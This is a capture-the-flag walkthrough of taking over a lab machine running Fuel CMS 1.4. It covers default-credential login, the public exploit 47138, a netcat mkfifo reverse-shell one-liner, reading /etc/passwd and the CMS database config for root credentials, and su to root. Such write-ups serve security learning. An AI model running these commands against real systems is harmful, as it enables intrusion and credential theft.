[Enumeration]
- Port Scan
nmap -Pn <ip>
nmap -Pn -p1000- <ip>
2. OS and services scan
nmap -A -p 80 <ip>This machine uses Ubuntu
HTTP site is likely to have Fuel CMS installed.
There’s a robots.txt file on this site.
3. Vulnerable scan
nmap --script vuln <ip>
4. Access HTTP site
Seems like the CMS is just installed.
Version no. is 1.4 .
There’s database configuration file.
Default credential “admin:admin”
Access login page which is also occurred in robots.txt
Try admin:admin
Here’s the dashboard.
Access other pages from vulnerable scan. They all have same results.
[Exploitation]
- Search for public exploits
searchsploit fuel cms
Copy it
searchsploit -m 471382. Review the code
Seems like I have to put target IP and use Burp Suite proxy
3. Replace with target IP
4. Open Burp Suite. I’ll turn off the intercept first.
5. Run the script
python 47138.pySeems like the exploit is work.
Test for command
whoami
6. Reverse shell
Create listener
nc -lvp 1234
Pass reverse shell command
Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
I try many command, but I succeeded with this
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1234 >/tmp/f
Back to listener, now I have a shell.
7. TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
8. Read user.txt
cd /homels
cd www-datalscat flag.txt
9. Privilege escalation
Verify users
cat /etc/passwdSeems like only user is “root”.
SUID
find / -perm -u=s -type f 2>/dev/nullNot useful
Kernel
uname -aNot useful
Cron
cat /etc/crontabNot useful
Seems like nothing I can do, but I remember that CMS has some config file. I may grab some credential from it.
cat /var/www/html/fuel/application/config/database.phpCredential “root:mememe”
Let’s try login as root.
su -
10. Read root.txt
cd /rootlscat root.txt
